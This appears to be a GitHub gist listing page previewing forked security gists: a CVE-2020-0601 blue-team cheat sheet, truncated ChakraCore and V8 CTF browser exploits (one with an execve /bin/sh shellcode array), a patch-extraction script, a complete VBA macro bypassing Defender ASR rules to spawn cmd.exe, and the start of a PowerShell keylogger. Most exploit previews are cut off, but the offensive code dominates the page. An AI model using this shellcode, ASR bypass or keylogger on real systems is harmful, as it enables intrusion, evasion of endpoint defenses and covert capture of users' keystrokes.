@raystyle
raystyle / 20200114-TLP-WHITE_CVE-2020-0601.md
Created January 15, 2020 09:09 — forked from SwitHak/20200114-TLP-WHITE_CVE-2020-0601.md
BlueTeam CheatSheet * CVE-2020-0601 * crypto32.dll

CVE-2020-0601

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, announced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@raystyle
raystyle / exploit.js
Created September 18, 2019 02:09 — forked from itszn/exploit.js
Trendmicro CTF ChakraCore exploit
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@raystyle
raystyle / poc.js
Created September 18, 2019 02:07 — forked from thetlk/poc.js
realworldctf2019 accessible v8 exploit
let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);
let f2i = (f) => {
fv[0] = f;
return dv[0];
}
console.show()
function gc() {
for(var i = 0; i < 3; i++) {
var z = new ArrayBuffer(1024*1024*100)
}
}
String.prototype.hex = function() {
var r = ''
@raystyle
raystyle / PatchExtract125.ps1
Created May 28, 2019 02:01 — forked from moshekaplan/PatchExtract125.ps1
Patch Extract v1.25 by Greg Linares (@Laughing_Mantis)
<#
================
PATCHEXTRACT.PS1
=================
Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)
This PowerShell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.
Organization of the output files is based on the patch's files and will organize them based on their architecture (x86, x64, or wow64)
as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will
@raystyle
raystyle / ASR Rules Bypass.vba
Created May 7, 2019 08:28 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@raystyle
raystyle / gist:b6a7961eeb28331637e370ae911af16d
Created April 28, 2019 03:32 — forked from dasgoll/gist:7ca1c059dd3b3fbc7277
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
@raystyle
raystyle / pwn.js
Created April 8, 2019 03:21 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down to "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
@raystyle
raystyle / CVE-2018-17480
Created April 3, 2019 09:33
CVE-2018-17480,CVE-2018-18342,CVE-2019-5763
https://bugs.chromium.org/p/chromium/issues/detail?id=905940